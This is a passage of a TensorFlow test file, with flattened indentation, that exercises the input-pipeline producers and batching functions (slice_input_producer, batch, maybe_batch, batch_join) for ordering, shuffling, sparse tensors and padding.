variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# Validate that we only shuffle the integers within an epoch and
# count how often each possible order appears.
expected = [12, 21]
frequency = {}
for e in expected:
frequency[e] = 0
for _ in range(num_epochs):
output = self.evaluate(dequeue_many)
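# Encode the order of the two dequeued values as a two-digit key:
# [0, 1] -> 12 and [1, 0] -> 21, matching `expected` above.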
key = 10 * (output[0] + 1) + (output[1] + 1)
self.assertIn(key, expected)
frequency[key] += 1
# Expect an approximately even distribution over all possible orders.
expected_frequency = num_epochs / len(expected)
margin = expected_frequency * 0.4
tf_logging.info("Observed counts: %s", frequency)
for key in expected:
value = frequency[key]
self.assertGreater(value, expected_frequency - margin)
self.assertLess(value, expected_frequency + margin)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(dequeue)
for thread in threads:
thread.join()
def testSharedName(self):
with self.cached_session():
range_size = 5
queue = inp.range_input_producer(
range_size, shared_name="SHARED_NAME_XYZ", name="Q")
self.assertProtoEquals("s: 'SHARED_NAME_XYZ'",
queue.queue_ref.op.node_def.attr["shared_name"])
class SliceInputProducerTest(test_lib.TestCase):
def testNoShuffle(self):
with self.cached_session() as sess:
num_epochs = 3
source_strings = [b"Alpha", b"Beta", b"Delta", b"Gamma"]
source_ints = [2, 3, 5, 7]
slices = inp.slice_input_producer(
[source_strings, source_ints], num_epochs=num_epochs, shuffle=False)
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# No randomness, so just see repeated copies of the input.
num_items = len(source_strings) * num_epochs
output = [sess.run(slices) for _ in range(num_items)]
out_strings, out_ints = zip(*output)
self.assertAllEqual(source_strings * num_epochs, out_strings)
self.assertAllEqual(source_ints * num_epochs, out_ints)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(slices)
for thread in threads:
thread.join()
def testShuffle(self):
with self.cached_session() as sess:
num_epochs = 1200
source_strings = ["A", "B", "D", "G"]
source_ints = [7, 3, 5, 2]
slices = inp.slice_input_producer(
[source_strings, source_ints],
num_epochs=num_epochs,
shuffle=True,
seed=161803)
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# Validate that we only shuffle the integers within an epoch and
# count how often each possible order appears.
expected = [
b",".join(x)
for x in itertools.permutations([b"A7", b"B3", b"D5", b"G2"])
]
frequency = {}
for e in expected:
frequency[e] = 0
for _ in range(num_epochs):
output = [sess.run(slices) for _ in range(len(source_strings))]
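# Join each (string, int) slice into a key such as b"A7,B3,D5,G2", recording
# the order in which the four slices were produced during this epoch.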
key = b",".join([s + compat.as_bytes(str(i)) for s, i in output])
self.assertIn(key, expected)
frequency[key] += 1
# Expect an approximately even distribution over all possible orders.
expected_frequency = num_epochs / len(expected)
margin = expected_frequency * 0.4
tf_logging.info("Observed counts: %s", frequency)
for key in expected:
value = frequency[key]
self.assertGreater(value, expected_frequency - margin)
self.assertLess(value, expected_frequency + margin)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(slices)
for thread in threads:
thread.join()
def testSharedName(self):
with self.cached_session():
source_strings = ["A", "B", "D", "G"]
source_ints = [7, 3, 5, 2]
slices = inp.slice_input_producer(
[source_strings, source_ints],
shared_name="SHARED_NAME_XYZ",
name="sip")
self.assertProtoEquals(
"s: 'SHARED_NAME_XYZ'",
slices[0].op.inputs[1].op.inputs[0].op.node_def.attr["shared_name"])
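# NOTE: illustrative sketch only, not part of the original test suite.
# slice_input_producer pairs up parallel lists and emits one aligned slice per
# dequeue, as exercised above; a minimal hedged usage:
#
#   strings, ints = inp.slice_input_producer(
#       [source_strings, source_ints], num_epochs=1, shuffle=False)
#   # After starting queue runners, each sess.run([strings, ints]) yields one
#   # (string, int) pair in order until OutOfRangeError is raised.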
class DictHelperTest(test_lib.TestCase):
def testListInputs(self):
l = [1, 2, 3, 11, 22, 33]
l2 = inp._as_tensor_list(l)
self.assertEquals(l, l2)
l3 = inp._as_original_type(l, l2)
self.assertEquals(l, l3)
def testDictInputs(self):
d = {"a": 1, "b": 2, "c": 3, "aa": 11, "bb": 22, "cc": 33}
l = inp._as_tensor_list(d)
self.assertEquals([1, 11, 2, 22, 3, 33], l)
d2 = inp._as_original_type(d, l)
self.assertEquals(d, d2)
def testHeterogeneousKeysDictInputs(self):
d = {"z": 1, 1: 42, ("a", "b"): 100}
l = inp._as_tensor_list(d)
self.assertEquals([100, 42, 1], l)
d2 = inp._as_original_type(d, l)
self.assertEquals(d, d2)
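# NOTE: illustrative sketch only, not part of the original test suite. The
# _as_tensor_list/_as_original_type helpers round-trip dict inputs through the
# flat list form the queue ops require, e.g.:
#
#   d = {"a": 1, "b": 2}
#   l = inp._as_tensor_list(d)              # -> [1, 2], values ordered by key
#   assert inp._as_original_type(d, l) == d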
class BatchTest(test_lib.TestCase):
def _testOneThreadHelper(self, use_dict):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(
array_ops.stack([zero64, zero64 + 1]), [2, 1]),
values=math_ops.cast(
array_ops.stack([counter, -counter]), dtypes.float32),
dense_shape=[2])
if use_dict:
batched = inp.batch(
{
"c": counter,
"s": sparse_counter,
"S": "string"
},
batch_size=batch_size)
batched_fetch = [batched["c"], batched["s"], batched["S"]]
else:
batched = inp.batch(
[counter, sparse_counter, "string"], batch_size=batch_size)
batched_fetch = batched
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
for i in range(num_batches):
results = sess.run(batched_fetch)
self.assertAllEqual(results[0],
np.arange(i * batch_size, (i + 1) * batch_size))
self.assertAllEqual(
results[1].indices,
np.vstack((
np.arange(2 * batch_size) // 2, # 0, 0, 1, 1, ...
[0, 1] * batch_size)).T)
# [x, -x, x+1, -(x+1), ...]
expected = np.arange(2 * i * batch_size, 2 * (i + 1) * batch_size) // 2
expected *= ([1, -1] * batch_size) # mult by [1, -1, 1, -1, ...]
self.assertAllEqual(results[1].values, expected)
self.assertAllEqual(results[1].dense_shape, [batch_size, 2])
self.assertAllEqual(results[2], [b"string"] * batch_size)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched_fetch)
for thread in threads:
thread.join()
def testOneThread(self):
self._testOneThreadHelper(use_dict=False)
def testOneThreadDict(self):
self._testOneThreadHelper(use_dict=True)
def testUint32DataTypes(self):
values = constant_op.constant([0, 1, 2, 3, 4, 5], dtype=dtypes.uint32)
batched = inp.batch([values], batch_size=2)
with self.cached_session() as sess:
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(sess=sess, coord=coord)
sess.run(batched)
coord.request_stop()
for thread in threads:
thread.join()
def testUint64DataTypes(self):
values = constant_op.constant([0, 1, 2, 3, 4, 5], dtype=dtypes.uint64)
batched = inp.batch([values], batch_size=2)
with self.cached_session() as sess:
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(sess=sess, coord=coord)
sess.run(batched)
coord.request_stop()
for thread in threads:
thread.join()
def testOneThreadDynamicPad(self):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
string = array_ops.tile(["string"],
math_ops.to_int32(array_ops.stack([counter])))
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
batched = inp.batch(
[counter, string], batch_size=batch_size, dynamic_pad=True)
threads = queue_runner_impl.start_queue_runners()
for i in range(num_batches):
results = sess.run(batched)
expected_results = np.arange(i * batch_size, (i + 1) * batch_size)
max_len = expected_results[-1]
self.assertAllEqual(results[0], expected_results)
expected_strings = [[b"string"] * rep + [b""] * (max_len - rep)
for rep in expected_results]
self.assertAllEqual(results[1], expected_strings)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testOneThreadEnqueueMany(self):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
pre_batched = inp.batch([counter, sparse_counter, "string"], batch_size=2)
batched = inp.batch(pre_batched, enqueue_many=True, batch_size=batch_size)
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
for i in range(num_batches):
results = sess.run(batched)
self.assertAllEqual(results[0],
np.arange(i * batch_size, (i + 1) * batch_size))
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[1].values,
np.arange(i * batch_size, (i + 1) * batch_size))
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
self.assertAllEqual(results[2], [b"string"] * batch_size)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testManyThreads(self):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
batched = inp.batch(
[counter, sparse_counter, "string"],
batch_size=batch_size,
num_threads=4)
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
all_counts = []
for i in range(num_batches):
results = sess.run(batched)
tf_logging.info("Batch %d: %s", i, results[0])
self.assertEqual(len(results[0]), batch_size)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
all_counts.extend(results[0])
self.assertAllEqual(results[2], [b"string"] * batch_size)
self.assertItemsEqual(all_counts, range(num_batches * batch_size))
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testOneThreadSmallerBatch(self):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
extra_elements = 5
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size + extra_elements)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(
array_ops.stack([zero64, zero64 + 1]), [2, 1]),
values=math_ops.cast(
array_ops.stack([counter, -counter]), dtypes.float32),
dense_shape=[2])
batched = inp.batch(
[counter, sparse_counter, "string"],
batch_size=batch_size,
allow_smaller_final_batch=True)
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
for i in range(num_batches):
results = sess.run(batched)
self.assertAllEqual(results[0],
np.arange(i * batch_size, (i + 1) * batch_size))
self.assertAllEqual(
results[1].indices,
np.vstack((
np.arange(2 * batch_size) // 2, # 0, 0, 1, 1, ...
[0, 1] * batch_size)).T)
# [x, -x, x+1, -(x+1), ...]
expected = np.arange(2 * i * batch_size, 2 * (i + 1) * batch_size) // 2
expected *= ([1, -1] * batch_size) # mult by [1, -1, 1, -1, ...]
self.assertAllEqual(results[1].values, expected)
self.assertAllEqual(results[1].dense_shape, [batch_size, 2])
self.assertAllEqual(results[2], [b"string"] * batch_size)
# Reached the final batch with extra_elements.
results = sess.run(batched)
self.assertAllEqual(results[0],
np.arange(num_batches * batch_size,
num_batches * batch_size + extra_elements))
self.assertAllEqual(
results[1].indices,
np.vstack((
np.arange(2 * extra_elements) // 2, # 0, 0, 1, 1, ...
[0, 1] * extra_elements)).T)
self.assertAllEqual(results[1].dense_shape, [extra_elements, 2])
self.assertAllEqual(results[2], [b"string"] * extra_elements)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testManyThreadsSmallerBatch(self):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
extra_elements = 5
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size + extra_elements)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
batched = inp.batch(
[counter, sparse_counter, "string"],
batch_size=batch_size,
num_threads=4,
allow_smaller_final_batch=True)
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
all_counts = []
for i in range(num_batches):
results = sess.run(batched)
tf_logging.info("Batch %d: %s", i, results[0])
self.assertEqual(len(results[0]), batch_size)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
all_counts.extend(results[0])
self.assertAllEqual(results[2], [b"string"] * batch_size)
# Reached the final batch with extra_elements.
results = sess.run(batched)
tf_logging.info("Last Batch: %s", results[0])
self.assertEqual(len(results[0]), extra_elements)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(extra_elements), np.zeros(extra_elements))).T)
self.assertAllEqual(results[1].dense_shape, [extra_elements, 1])
all_counts.extend(results[0])
self.assertAllEqual(results[2], [b"string"] * extra_elements)
self.assertItemsEqual(all_counts,
range(num_batches * batch_size + extra_elements))
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testSharedName(self):
with self.cached_session():
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
batched = inp.batch(
[counter, "string"],
batch_size=batch_size,
shared_name="SHARED_NAME_XYZ",
name="Q")
self.assertProtoEquals(
"s: 'SHARED_NAME_XYZ'",
batched[0].op.inputs[0].op.node_def.attr["shared_name"])
def testCannotInferRankError(self):
with self.cached_session():
x = array_ops.placeholder(dtype=dtypes.int64)
with self.assertRaisesRegexp(ValueError, "Cannot infer Tensor's rank"):
inp.batch([x], batch_size=2)
def testBatchedSparseTensorInferredShape(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.batch([sparse], batch_size=2)
self.assertAllEqual((2,), batched.dense_shape.get_shape().as_list())
def testBatchedSparseTensorInferredShapeEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.batch([sparse], batch_size=2, enqueue_many=True)
self.assertAllEqual((1,), batched.dense_shape.get_shape().as_list())
def testBatchedSparseTensorInferredShapeUnknownRank(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.batch([sparse], batch_size=2)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testBatchedSparseTensorInferredShapeUnknownRankEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.batch([sparse], batch_size=2, enqueue_many=True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testSingleElementDict(self):
x = inp.batch({"c": [12, 12]}, batch_size=8)
self.assertAllEqual((8, 2), x["c"].get_shape().as_list())
def _testKeepInputHelper(self, num_threads, enqueue_many,
keep_input_vector=False):
with self.cached_session() as sess:
batch_size = 5
num_batches = 4
examples = variables.Variable(0)
counter = examples.count_up_to(num_batches * batch_size * 2)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.zeros(
[1, 1], dtype=dtypes.int64),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
to_batch = [counter, sparse_counter, "string"]
if enqueue_many:
to_batch = inp.batch(to_batch, 4 if keep_input_vector else 1)
keep_input = array_ops.squeeze(
math_ops.equal(0, math_ops.mod(to_batch[0], 2)))
batched = inp.maybe_batch(
to_batch,
keep_input,
batch_size,
num_threads=num_threads,
enqueue_many=enqueue_many)
variables.initialize_all_variables().run()
variables.initialize_local_variables().run()
threads = queue_runner_impl.start_queue_runners()
for _ in range(num_batches):
results = sess.run(batched)
self.assertAllEqual([0] * batch_size, np.mod(results[0], 2))
self.assertAllEqual([0] * batch_size, np.mod(results[1].values, 2))
self.assertAllEqual([b"string"] * batch_size, results[2])
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testSingleThreadKeepInput(self):
self._testKeepInputHelper(1, False)
def testSingleThreadKeepInputEnqueueMany(self):
self._testKeepInputHelper(1, True)
def testMultipleThreadKeepInput(self):
self._testKeepInputHelper(5, False)
def testMultipleThreadKeepInputEnqueueMany(self):
self._testKeepInputHelper(5, True)
def testMaybeEnqueuePerExample(self):
self._testKeepInputHelper(1, True, keep_input_vector=True)
def testMultipleThreadMaybeEnqueuePerExample(self):
self._testKeepInputHelper(5, True, keep_input_vector=True)
def testInvalidKeepInputVector(self):
# Can't have vector `keep_input` with `enqueue_many=False`.
with self.assertRaisesRegexp(ValueError, "`keep_input` cannot be a vector"):
inp.maybe_batch([array_ops.zeros(5)],
keep_input=constant_op.constant([True, False]),
batch_size=1,
enqueue_many=False)
# Can't have `keep_input` with more than one dimension.
with self.assertRaisesRegexp(ValueError, "must be 0 or 1 dimensions"):
inp.maybe_batch([array_ops.zeros(5)],
keep_input=constant_op.constant([[True], [False]]),
batch_size=1,
enqueue_many=True)
# `keep_input` must have dimensions determined at graph construction.
with self.assertRaisesRegexp(ValueError,
"must be known at graph construction"):
inp.maybe_batch([array_ops.zeros(5)],
keep_input=array_ops.placeholder(dtypes.bool),
batch_size=1,
enqueue_many=True)
def testMaybeBatchedSparseTensorInferredShape(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_batch([sparse], keep_input=True, batch_size=2)
self.assertAllEqual((2,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_batch(
[sparse], keep_input=True, batch_size=2, enqueue_many=True)
self.assertAllEqual((1,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeEnqueueManyPerExample(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0], [0]], values=[1.0, 2.0], dense_shape=[2])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_batch(
[sparse], keep_input=[True, False], batch_size=2, enqueue_many=True)
self.assertAllEqual((1,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeUnknownRank(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_batch([sparse], keep_input=True, batch_size=2)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchedSparseTensorInferredShapeUnknownRankEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_batch(
[sparse], keep_input=True, batch_size=2, enqueue_many=True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchedSparseTensorInferredShapeUnknownRankPerExample(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_batch(
[sparse], keep_input=[True, False], batch_size=2, enqueue_many=True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchCorrectValues(self):
sparse_t = sparse_tensor.SparseTensor(
indices=[[0, 1], [0, 2], [1, 0], [1, 3]],
dense_shape=[2, 4],
values=[5, 4, 7, 2])
keep = constant_op.constant([True, False])
batched = inp.maybe_batch(
[sparse_t], keep_input=keep, batch_size=1, enqueue_many=True)
with self.cached_session():
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(coord=coord)
batched_np = self.evaluate(batched)
coord.request_stop()
for thread in threads:
thread.join()
self.assertAllEqual([[0, 1], [0, 2]], batched_np.indices)
self.assertAllEqual([5, 4], batched_np.values)
self.assertAllEqual([1, 4], batched_np.dense_shape)
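# NOTE: illustrative sketch only, not part of the original test suite. It shows
# the keep_input filtering pattern used by the maybe_batch tests above; the
# helper name is ours, not TensorFlow API, and `values` is assumed to be a 1-D
# integer tensor with a statically known shape.
def _example_keep_even(values, batch_size):
  """Batches `values`, keeping only the elements that are even."""
  keep = math_ops.equal(0, math_ops.mod(values, 2))
  return inp.maybe_batch(
      [values], keep_input=keep, batch_size=batch_size, enqueue_many=True)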
class BatchJoinTest(test_lib.TestCase):
def _testTwoThreadsHelper(self, use_dict):
with self.cached_session() as sess:
# Two threads, the first generates (0..69, "a").
num_a = 70
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_a)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
# The second generates (99, "b") 90 times and then stops.
num_b = 90
ninety_nine = inp.limit_epochs(
constant_op.constant(
99, dtype=dtypes.int64), num_b)
sparse_ninety_nine = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(ninety_nine, dtypes.float32)]),
dense_shape=[1])
# These get joined together and grouped into batches of 5.
batch_size = 5
if use_dict:
batched = inp.batch_join(
[{
"c": counter,
"s": sparse_counter,
"S": "a"
}, {
"c": ninety_nine,
"s": sparse_ninety_nine,
"S": "b"
}],
batch_size=batch_size)
batched_fetch = [batched["c"], batched["s"], batched["S"]]
else:
batched = inp.batch_join(
[[counter, sparse_counter, "a"],
[ninety_nine, sparse_ninety_nine, "b"]],
batch_size=batch_size)
batched_fetch = batched
# Shapes.
self.assertEqual(3, len(batched_fetch))
self.assertAllEqual((batch_size,), batched_fetch[0].get_shape().as_list())
self.assertAllEqual((None, 2),
batched_fetch[1].indices.get_shape().as_list())
self.assertAllEqual((None,),
batched_fetch[1].values.get_shape().as_list())
self.assertAllEqual((2,),
batched_fetch[1].dense_shape.get_shape().as_list())
self.assertAllEqual((batch_size,), batched_fetch[2].get_shape().as_list())
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# Should see the "a" and "b" threads mixed together.
all_a = []
seen_b = 0
saw_both = 0
num_batches = (num_a + num_b) // batch_size
for i in range(num_batches):
results = sess.run(batched_fetch)
self.assertEqual(3, len(results))
self.assertEqual(batch_size, len(results[0]))
self.assertEqual(batch_size, len(results[2]))
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
which_a = [i for i, s in enumerate(results[2]) if s == b"a"]
which_b = [i for i, s in enumerate(results[2]) if s == b"b"]
self.assertEqual(len(which_a) + len(which_b), batch_size)
if which_a and which_b:
saw_both += 1
all_a.extend([results[0][i] for i in which_a])
seen_b += len(which_b)
self.assertAllEqual([99] * len(which_b),
[results[0][i] for i in which_b])
# We'd like to see some minimum level of mixing of the results of both
# threads, but we can't rely on fair thread scheduling, so we just log.
# self.assertGreater(saw_both, 1)
tf_logging.info("testTwoThreads%s saw both count: %s",
"Dict" if use_dict else "", saw_both)
# Verify the order of results from "a" were preserved.
self.assertAllEqual(all_a, np.arange(num_a))
self.assertEqual(seen_b, num_b)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched_fetch)
for thread in threads:
thread.join()
def testTwoThreads(self):
self._testTwoThreadsHelper(use_dict=False)
def testTwoThreadsDict(self):
self._testTwoThreadsHelper(use_dict=True)
def testMismatchedDictKeys(self):
with self.assertRaisesRegexp(ValueError, "must have the same keys"):
inp.batch_join(
[{
"c": 12,
"s": 123,
"S": "a"
}, {
"cool": -12,
"s": 99,
"S": "b"
}],
batch_size=8)
def testTwoThreadsDynamicPad(self):
with self.cached_session() as sess:
# Two threads, the first generates (0..69, ["a"] * 1..70).
num_a = 70
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_a)
# The second generates (99, ["b"] * 99) 90 times and then stops.
num_b = 90
ninety_nine = inp.limit_epochs(
constant_op.constant(
99, dtype=dtypes.int64), num_b)
# These get joined together and grouped into batches of 5.
batch_size = 5
a = array_ops.tile(["a"],
math_ops.to_int32(array_ops.stack([counter + 1])))
b = array_ops.tile(["b"],
math_ops.to_int32(array_ops.stack([ninety_nine])))
batched = inp.batch_join(
[[counter, a], [ninety_nine, b]],
batch_size=batch_size,
dynamic_pad=True)
# Shapes.
self.assertEqual(2, len(batched))
self.assertAllEqual((batch_size,), batched[0].get_shape().as_list())
self.assertAllEqual((batch_size, None), batched[1].get_shape().as_list())
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# Should see the "a" and "b" threads mixed together.
all_a = []
count_string_a = []
seen_b = 0
saw_both = 0
num_batches = (num_a + num_b) // batch_size
for i in range(num_batches):
results = sess.run(batched)
self.assertEqual(2, len(results))
self.assertEqual(len(results[0]), batch_size)
self.assertEqual(len(results[1]), batch_size)
for s in results[1]:
if s[0] == b"b":
self.assertAllEqual(s, [b"b"] * 99)
else:
count_string_a.append(sum(x == b"a" for x in s))
which_a = [i for i, s in enumerate(results[1]) if s[0] == b"a"]
which_b = [i for i, s in enumerate(results[1]) if s[0] == b"b"]
self.assertEqual(len(which_a) + len(which_b), batch_size)
if which_a and which_b:
saw_both += 1
all_a.extend([results[0][i] for i in which_a])
seen_b += len(which_b)
self.assertAllEqual([99] * len(which_b),
[results[0][i] for i in which_b])
# We'd like to see some minimum level of mixing of the results of both
# threads, but we can't rely on fair thread scheduling, so we just log.
# self.assertGreater(saw_both, 1)
tf_logging.info("testTwoThreadsDynamicPad saw both count: %s", saw_both)
# Verify the order of results from "a" were preserved.
self.assertAllEqual( # tiled "a" with counter + 1
count_string_a, np.arange(num_a) + 1)
self.assertAllEqual(all_a, np.arange(num_a))
self.assertEqual(seen_b, num_b)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testTwoThreadsSmallerBatch(self):
with self.cached_session() as sess:
extra_elements = 2
# Two threads, the first generates (0..69, "a").
num_a = 70 + extra_elements
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_a)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
# The second generates (99, "b") 90 times and then stops.
num_b = 90 + extra_elements
ninety_nine = inp.limit_epochs(
constant_op.constant(
99, dtype=dtypes.int64), num_b)
sparse_ninety_nine = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(ninety_nine, dtypes.float32)]),
dense_shape=[1])
# These get joined together and grouped into batches of 5.
batch_size = 5
batched = inp.batch_join(
[[counter, sparse_counter, "a"],
[ninety_nine, sparse_ninety_nine, "b"]],
batch_size=batch_size,
allow_smaller_final_batch=True)
# Shapes.
self.assertEqual(3, len(batched))
self.assertAllEqual((None,), batched[0].get_shape().as_list())
self.assertAllEqual((None, 2), batched[1].indices.get_shape().as_list())
self.assertAllEqual((None,), batched[1].values.get_shape().as_list())
self.assertAllEqual((2,), batched[1].dense_shape.get_shape().as_list())
self.assertAllEqual((None,), batched[2].get_shape().as_list())
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# Should see the "a" and "b" threads mixed together.
all_a = []
seen_b = 0
saw_both = 0
num_batches = (num_a + num_b) // batch_size
for i in range(num_batches):
results = sess.run(batched)
tf_logging.info("Batch %d: %s", i, results[0])
self.assertEqual(len(results[0]), batch_size)
self.assertEqual(len(results[2]), batch_size)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(
results[1].indices,
